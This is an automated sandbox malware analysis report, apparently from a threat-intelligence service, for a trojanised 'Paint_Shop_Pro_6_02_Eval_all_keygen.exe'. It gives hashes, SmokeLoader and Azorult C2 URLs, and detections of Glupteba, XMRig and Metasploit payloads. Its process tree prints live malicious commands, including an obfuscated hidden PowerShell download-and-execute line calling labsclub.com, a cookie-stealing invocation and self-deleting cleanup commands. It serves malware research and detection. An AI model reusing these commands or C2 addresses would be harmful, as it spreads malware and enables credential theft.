Analysis
-
max time kernel
59s -
max time network
302s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
04-04-2021 18:22
Static task
static1
Behavioral task
behavioral1
Sample
Paint_Shop_Pro_6_02_Eval_all_keygen.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Paint_Shop_Pro_6_02_Eval_all_keygen.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Paint_Shop_Pro_6_02_Eval_all_keygen.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Paint_Shop_Pro_6_02_Eval_all_keygen.exe
Resource
win10v20201028
General
-
Target
Paint_Shop_Pro_6_02_Eval_all_keygen.exe
-
Size
5.2MB
-
MD5
c9d0760f5504d9e8ce237543fc4e7562
-
SHA1
12dac9b23d9f95b9647767e15a265a73380ad50b
-
SHA256
2519f6e84956fd35aaf7aa0ac51c2ce4cd8fddc973933936560ddb1efff6a16f
-
SHA512
28e06d8763858601484ec3675b5d0895712b616d69b36d4c584f32dfb56dfe9a7c26ad05dfda27efc2e9512c11d7dedcafd4d69d98baffdda8eb5af9ba99398a
Malware Config
Extracted
http://labsclub.com/welcome
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2020
http://999080321newfolder1002002131-service1002.space/
http://999080321newfolder1002002231-service1002.space/
http://999080321newfolder3100231-service1002.space/
http://999080321newfolder1002002431-service1002.space/
http://999080321newfolder1002002531-service1002.space/
http://999080321newfolder33417-012425999080321.space/
http://999080321test125831-service10020125999080321.space/
http://999080321test136831-service10020125999080321.space/
http://999080321test147831-service10020125999080321.space/
http://999080321test146831-service10020125999080321.space/
http://999080321test134831-service10020125999080321.space/
http://999080321est213531-service1002012425999080321.ru/
http://999080321yes1t3481-service10020125999080321.ru/
http://999080321test13561-service10020125999080321.su/
http://999080321test14781-service10020125999080321.info/
http://999080321test13461-service10020125999080321.net/
http://999080321test15671-service10020125999080321.tech/
http://999080321test12671-service10020125999080321.online/
http://999080321utest1341-service10020125999080321.ru/
http://999080321uest71-service100201dom25999080321.ru/
http://999080321test61-service10020125999080321.website/
http://999080321test51-service10020125999080321.xyz/
http://999080321test41-service100201pro25999080321.ru/
http://999080321yest31-service100201rus25999080321.ru/
http://999080321rest21-service10020125999080321.eu/
http://999080321test11-service10020125999080321.press/
http://999080321newfolder4561-service10020125999080321.ru/
http://999080321rustest213-service10020125999080321.ru/
http://999080321test281-service10020125999080321.ru/
http://999080321test261-service10020125999080321.space/
http://999080321yomtest251-service10020125999080321.ru/
http://999080321yirtest231-service10020125999080321.ru/
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Glupteba Payload 3 IoCs
resource yara_rule behavioral2/memory/4424-201-0x00000000024D0000-0x0000000002DDA000-memory.dmp family_glupteba behavioral2/memory/4424-204-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba behavioral2/memory/4424-203-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
XMRig Miner Payload 5 IoCs
resource yara_rule behavioral2/memory/4620-143-0x00000001402CA898-mapping.dmp xmrig behavioral2/memory/4620-142-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral2/memory/4620-145-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral2/memory/4620-224-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral2/memory/7416-781-0x0000000140000000-0x000000014070A000-memory.dmp xmrig -
Executes dropped EXE 10 IoCs
pid Process 668 keygen-pr.exe 1268 keygen-step-1.exe 576 keygen-step-3.exe 1196 keygen-step-4.exe 2180 key.exe 3344 Setup.exe 3176 multitimer.exe 1784 setups.exe 4032 askinstall20.exe 4036 setups.tmp -
Loads dropped DLL 7 IoCs
pid Process 4036 setups.tmp 4036 setups.tmp 4036 setups.tmp 4036 setups.tmp 4036 setups.tmp 4036 setups.tmp 4036 setups.tmp -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 140 ipinfo.io 142 ipinfo.io 181 ip-api.com 285 ipinfo.io 287 ipinfo.io 338 ip-api.com 443 ipinfo.io -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 14 IoCs
pid pid_target Process procid_target 5264 5216 WerFault.exe 155 6240 5216 WerFault.exe 155 7148 5216 WerFault.exe 155 7560 5216 WerFault.exe 155 7580 5216 WerFault.exe 155 908 5216 WerFault.exe 155 7924 5216 WerFault.exe 155 7724 5216 WerFault.exe 155 3776 5216 WerFault.exe 155 8792 5216 WerFault.exe 155 8300 5216 WerFault.exe 155 7428 5216 WerFault.exe 155 8600 5216 WerFault.exe 155 8692 5216 WerFault.exe 155 -
Delays execution with timeout.exe 1 IoCs
pid Process 6508 timeout.exe -
Kills process with taskkill 5 IoCs
pid Process 812 taskkill.exe 4896 taskkill.exe 6756 taskkill.exe 6264 taskkill.exe 6408 taskkill.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 askinstall20.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e askinstall20.exe -
Runs ping.exe 1 TTPs 4 IoCs
pid Process 2644 PING.EXE 1668 PING.EXE 4760 PING.EXE 8360 PING.EXE -
Script User-Agent 6 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 286 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 296 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 440 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 446 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 141 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 148 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4036 setups.tmp 4036 setups.tmp -
Suspicious use of AdjustPrivilegeToken 36 IoCs
description pid Process Token: SeDebugPrivilege 3344 Setup.exe Token: SeCreateTokenPrivilege 4032 askinstall20.exe Token: SeAssignPrimaryTokenPrivilege 4032 askinstall20.exe Token: SeLockMemoryPrivilege 4032 askinstall20.exe Token: SeIncreaseQuotaPrivilege 4032 askinstall20.exe Token: SeMachineAccountPrivilege 4032 askinstall20.exe Token: SeTcbPrivilege 4032 askinstall20.exe Token: SeSecurityPrivilege 4032 askinstall20.exe Token: SeTakeOwnershipPrivilege 4032 askinstall20.exe Token: SeLoadDriverPrivilege 4032 askinstall20.exe Token: SeSystemProfilePrivilege 4032 askinstall20.exe Token: SeSystemtimePrivilege 4032 askinstall20.exe Token: SeProfSingleProcessPrivilege 4032 askinstall20.exe Token: SeIncBasePriorityPrivilege 4032 askinstall20.exe Token: SeCreatePagefilePrivilege 4032 askinstall20.exe Token: SeCreatePermanentPrivilege 4032 askinstall20.exe Token: SeBackupPrivilege 4032 askinstall20.exe Token: SeRestorePrivilege 4032 askinstall20.exe Token: SeShutdownPrivilege 4032 askinstall20.exe Token: SeDebugPrivilege 4032 askinstall20.exe Token: SeAuditPrivilege 4032 askinstall20.exe Token: SeSystemEnvironmentPrivilege 4032 askinstall20.exe Token: SeChangeNotifyPrivilege 4032 askinstall20.exe Token: SeRemoteShutdownPrivilege 4032 askinstall20.exe Token: SeUndockPrivilege 4032 askinstall20.exe Token: SeSyncAgentPrivilege 4032 askinstall20.exe Token: SeEnableDelegationPrivilege 4032 askinstall20.exe Token: SeManageVolumePrivilege 4032 askinstall20.exe Token: SeImpersonatePrivilege 4032 askinstall20.exe Token: SeCreateGlobalPrivilege 4032 askinstall20.exe Token: 31 4032 askinstall20.exe Token: 32 4032 askinstall20.exe Token: 33 4032 askinstall20.exe Token: 34 4032 askinstall20.exe Token: 35 4032 askinstall20.exe Token: SeDebugPrivilege 3176 multitimer.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1784 setups.exe 4036 setups.tmp -
Suspicious use of WriteProcessMemory 43 IoCs
description pid Process procid_target PID 1032 wrote to memory of 2788 1032 Paint_Shop_Pro_6_02_Eval_all_keygen.exe 79 PID 1032 wrote to memory of 2788 1032 Paint_Shop_Pro_6_02_Eval_all_keygen.exe 79 PID 1032 wrote to memory of 2788 1032 Paint_Shop_Pro_6_02_Eval_all_keygen.exe 79 PID 2788 wrote to memory of 668 2788 cmd.exe 82 PID 2788 wrote to memory of 668 2788 cmd.exe 82 PID 2788 wrote to memory of 668 2788 cmd.exe 82 PID 2788 wrote to memory of 1268 2788 cmd.exe 83 PID 2788 wrote to memory of 1268 2788 cmd.exe 83 PID 2788 wrote to memory of 1268 2788 cmd.exe 83 PID 2788 wrote to memory of 576 2788 cmd.exe 84 PID 2788 wrote to memory of 576 2788 cmd.exe 84 PID 2788 wrote to memory of 576 2788 cmd.exe 84 PID 2788 wrote to memory of 1196 2788 cmd.exe 85 PID 2788 wrote to memory of 1196 2788 cmd.exe 85 PID 2788 wrote to memory of 1196 2788 cmd.exe 85 PID 668 wrote to memory of 2180 668 keygen-pr.exe 86 PID 668 wrote to memory of 2180 668 keygen-pr.exe 86 PID 668 wrote to memory of 2180 668 keygen-pr.exe 86 PID 1196 wrote to memory of 3344 1196 keygen-step-4.exe 87 PID 1196 wrote to memory of 3344 1196 keygen-step-4.exe 87 PID 2180 wrote to memory of 636 2180 key.exe 88 PID 2180 wrote to memory of 636 2180 key.exe 88 PID 2180 wrote to memory of 636 2180 key.exe 88 PID 576 wrote to memory of 676 576 keygen-step-3.exe 89 PID 576 wrote to memory of 676 576 keygen-step-3.exe 89 PID 576 wrote to memory of 676 576 keygen-step-3.exe 89 PID 676 wrote to memory of 2644 676 cmd.exe 91 PID 676 wrote to memory of 2644 676 cmd.exe 91 PID 676 wrote to memory of 2644 676 cmd.exe 91 PID 3344 wrote to memory of 3176 3344 Setup.exe 92 PID 3344 wrote to memory of 3176 3344 Setup.exe 92 PID 3344 wrote to memory of 1784 3344 Setup.exe 93 PID 3344 wrote to memory of 1784 3344 Setup.exe 93 PID 3344 wrote to memory of 1784 3344 Setup.exe 93 PID 1196 wrote to memory of 4032 1196 keygen-step-4.exe 94 PID 1196 wrote to memory of 4032 1196 keygen-step-4.exe 94 PID 1196 wrote to memory of 4032 1196 keygen-step-4.exe 94 PID 1784 wrote to memory of 4036 1784 setups.exe 95 PID 1784 wrote to memory of 4036 1784 setups.exe 95 PID 1784 wrote to memory of 4036 1784 setups.exe 95 PID 4032 wrote to memory of 4044 4032 askinstall20.exe 97 PID 4032 wrote to memory of 4044 4032 askinstall20.exe 97 PID 4032 wrote to memory of 4044 4032 askinstall20.exe 97
Processes
-
C:\Users\Admin\AppData\Local\Temp\Paint_Shop_Pro_6_02_Eval_all_keygen.exe"C:\Users\Admin\AppData\Local\Temp\Paint_Shop_Pro_6_02_Eval_all_keygen.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1032 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2788 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:668 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵PID:636
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:1268
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:576 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:676 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:2644
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1196 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3344 -
C:\Users\Admin\AppData\Local\Temp\WVVAELMSOA\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\WVVAELMSOA\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3176 -
C:\Users\Admin\AppData\Local\Temp\WVVAELMSOA\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\WVVAELMSOA\multitimer.exe" 1 3.1617560643.606a0443b1777 1016⤵PID:4424
-
C:\Users\Admin\AppData\Local\Temp\WVVAELMSOA\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\WVVAELMSOA\multitimer.exe" 2 3.1617560643.606a0443b17777⤵PID:4584
-
C:\Users\Admin\AppData\Local\Temp\4onu2fzc3jg\zkfjid5xecg.exe"C:\Users\Admin\AppData\Local\Temp\4onu2fzc3jg\zkfjid5xecg.exe" /VERYSILENT8⤵PID:4412
-
C:\Users\Admin\AppData\Local\Temp\is-N1PF1.tmp\zkfjid5xecg.tmp"C:\Users\Admin\AppData\Local\Temp\is-N1PF1.tmp\zkfjid5xecg.tmp" /SL5="$302B8,2592217,780800,C:\Users\Admin\AppData\Local\Temp\4onu2fzc3jg\zkfjid5xecg.exe" /VERYSILENT9⤵PID:4884
-
C:\Users\Admin\AppData\Local\Temp\is-FHPJO.tmp\winlthsth.exe"C:\Users\Admin\AppData\Local\Temp\is-FHPJO.tmp\winlthsth.exe"10⤵PID:4332
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"11⤵PID:4772
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"12⤵PID:5108
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\mpoxhopfczt\rgdzn2bik1y.exe"C:\Users\Admin\AppData\Local\Temp\mpoxhopfczt\rgdzn2bik1y.exe" /ustwo INSTALL8⤵PID:2368
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "rgdzn2bik1y.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\mpoxhopfczt\rgdzn2bik1y.exe" & exit9⤵PID:5596
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "rgdzn2bik1y.exe" /f10⤵
- Kills process with taskkill
PID:4896
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\p2tu32czpbm\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\p2tu32czpbm\cpyrix.exe" /VERYSILENT8⤵PID:4548
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe9⤵PID:3808
-
C:\Users\Admin\AppData\Roaming\1.exe"{path}"10⤵PID:4668
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe9⤵PID:5284
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"10⤵PID:5556
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ekblvhx1tw3\app.exe"C:\Users\Admin\AppData\Local\Temp\ekblvhx1tw3\app.exe" /8-238⤵PID:4424
-
-
C:\Users\Admin\AppData\Local\Temp\fkcuy5vuxij\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\fkcuy5vuxij\Setup3310.exe" /Verysilent /subid=5778⤵PID:4656
-
C:\Users\Admin\AppData\Local\Temp\is-3LDUQ.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-3LDUQ.tmp\Setup3310.tmp" /SL5="$501D0,138429,56832,C:\Users\Admin\AppData\Local\Temp\fkcuy5vuxij\Setup3310.exe" /Verysilent /subid=5779⤵PID:1284
-
C:\Users\Admin\AppData\Local\Temp\is-M4U3R.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-M4U3R.tmp\Setup.exe" /Verysilent10⤵PID:2132
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"11⤵PID:5196
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵PID:4180
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵PID:5976
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"11⤵PID:5216
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5216 -s 95212⤵
- Program crash
PID:5264
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5216 -s 95612⤵
- Program crash
PID:6240
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5216 -s 108012⤵
- Program crash
PID:7148
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5216 -s 109612⤵
- Program crash
PID:7560
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5216 -s 106012⤵
- Program crash
PID:7580
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5216 -s 115612⤵
- Program crash
PID:908
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5216 -s 149612⤵
- Program crash
PID:7924
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5216 -s 154012⤵
- Program crash
PID:7724
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5216 -s 161212⤵
- Program crash
PID:3776
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5216 -s 176012⤵
- Program crash
PID:8792
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5216 -s 181212⤵
- Program crash
PID:8300
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5216 -s 142412⤵
- Program crash
PID:7428
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5216 -s 178012⤵
- Program crash
PID:8600
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5216 -s 162012⤵
- Program crash
PID:8692
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"11⤵PID:5236
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"11⤵PID:5260
-
C:\Users\Admin\AppData\Local\Temp\is-26SQ1.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-26SQ1.tmp\LabPicV3.tmp" /SL5="$20326,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"12⤵PID:5484
-
C:\Users\Admin\AppData\Local\Temp\is-B63CN.tmp\ppppppfy.exe"C:\Users\Admin\AppData\Local\Temp\is-B63CN.tmp\ppppppfy.exe" /S /UID=lab21413⤵PID:4232
-
C:\Program Files\VideoLAN\NFWAEEQVGS\prolab.exe"C:\Program Files\VideoLAN\NFWAEEQVGS\prolab.exe" /VERYSILENT14⤵PID:5576
-
C:\Users\Admin\AppData\Local\Temp\is-OFEJV.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-OFEJV.tmp\prolab.tmp" /SL5="$203EE,575243,216576,C:\Program Files\VideoLAN\NFWAEEQVGS\prolab.exe" /VERYSILENT15⤵PID:5812
-
-
-
C:\Users\Admin\AppData\Local\Temp\75-c6aed-773-25aa6-bf717938258ac\ZHimikuquqe.exe"C:\Users\Admin\AppData\Local\Temp\75-c6aed-773-25aa6-bf717938258ac\ZHimikuquqe.exe"14⤵PID:5472
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rxqmx2w3.c1o\md6_6ydj.exe & exit15⤵PID:1460
-
C:\Users\Admin\AppData\Local\Temp\rxqmx2w3.c1o\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\rxqmx2w3.c1o\md6_6ydj.exe16⤵PID:6932
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wc4d1i3k.xce\askinstall31.exe & exit15⤵PID:6296
-
C:\Users\Admin\AppData\Local\Temp\wc4d1i3k.xce\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\wc4d1i3k.xce\askinstall31.exe16⤵PID:7012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dn2vko4u.3vq\toolspab1.exe & exit15⤵PID:6640
-
C:\Users\Admin\AppData\Local\Temp\dn2vko4u.3vq\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\dn2vko4u.3vq\toolspab1.exe16⤵PID:7096
-
C:\Users\Admin\AppData\Local\Temp\dn2vko4u.3vq\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\dn2vko4u.3vq\toolspab1.exe17⤵PID:6928
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\e5d4xxwb.xpq\GcleanerWW.exe /mixone & exit15⤵PID:7088
-
-
-
C:\Users\Admin\AppData\Local\Temp\f3-77f4e-e5d-c2193-fed384a559148\Gamolixycy.exe"C:\Users\Admin\AppData\Local\Temp\f3-77f4e-e5d-c2193-fed384a559148\Gamolixycy.exe"14⤵PID:5224
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"11⤵PID:5304
-
C:\Users\Admin\AppData\Local\Temp\is-J4G6B.tmp\lylal220.tmp"C:\Users\Admin\AppData\Local\Temp\is-J4G6B.tmp\lylal220.tmp" /SL5="$20328,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"12⤵PID:5492
-
C:\Users\Admin\AppData\Local\Temp\is-VC79U.tmp\Microsoft.exe"C:\Users\Admin\AppData\Local\Temp\is-VC79U.tmp\Microsoft.exe" /S /UID=lylal22013⤵PID:6076
-
C:\Program Files\Mozilla Firefox\IWGDBZBXCX\irecord.exe"C:\Program Files\Mozilla Firefox\IWGDBZBXCX\irecord.exe" /VERYSILENT14⤵PID:5744
-
C:\Users\Admin\AppData\Local\Temp\is-L50B0.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-L50B0.tmp\irecord.tmp" /SL5="$4029E,6265333,408064,C:\Program Files\Mozilla Firefox\IWGDBZBXCX\irecord.exe" /VERYSILENT15⤵PID:4528
-
-
-
C:\Users\Admin\AppData\Local\Temp\8f-1f6cc-4e3-6adb4-1bdbf4a0126bf\Ripofiviju.exe"C:\Users\Admin\AppData\Local\Temp\8f-1f6cc-4e3-6adb4-1bdbf4a0126bf\Ripofiviju.exe"14⤵PID:4628
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\snwisd02.wmm\md6_6ydj.exe & exit15⤵PID:476
-
C:\Users\Admin\AppData\Local\Temp\snwisd02.wmm\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\snwisd02.wmm\md6_6ydj.exe16⤵PID:940
-
-
-
